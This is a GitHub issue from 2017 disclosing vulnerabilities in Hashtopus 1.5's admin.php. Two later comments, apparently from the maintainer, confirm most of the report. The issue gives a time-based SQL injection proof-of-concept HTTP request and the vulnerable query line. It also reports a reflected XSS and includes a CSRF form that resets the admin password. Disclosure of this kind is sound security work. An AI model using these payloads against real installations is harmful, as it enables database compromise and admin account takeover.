Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Hashtopus 1.5 Multiple Vulnerabilities #63

ghost opened this issue Jul 26, 2017 · 2 comments


None yet
1 participant
Copy link

commented Jul 26, 2017

SQL Injection (authenticated)
A SQL Injection is present in admin.php on line 1425:

          $vysledek=mysqli_query_wrapper($dblink,"INSERT INTO hashlists (name,format,hashtype) VALUES ('$name',$format,$hashtype)");

Proof of concept:

POST /hashtopus/admin.php?a=newhashlistp HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Cookie: PHPSESSID=<valid_session_id>
Connection: close

name=ASD&format=0 or SLEEP(10)

Reflective XSS (unauthenticated)
An unauthenticated reflective cross-site scripting is present on line 2826 in admin.php:

name=\"return\" value=\"".$_SERVER['QUERY_STRING']." 

Proof of concept:

CSRF (Change admin password to login)
Cross-site request forgery protection is not available on sensitive forms.

<script>history.pushState('', '', '/')</script>
    <form action="http://localhost/hashtopus/admin.php?a=config" method="POST">
      <input type="hidden" name="password" value="0wn3d" />
      <input type="submit" value="Submit request" />

This comment has been minimized.

Copy link

commented Dec 28, 2017

Hi. I didn't really bother with admin.php as long as user is authenticated...


This comment has been minimized.

Copy link

commented Dec 28, 2017

But with the rest you are right :)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.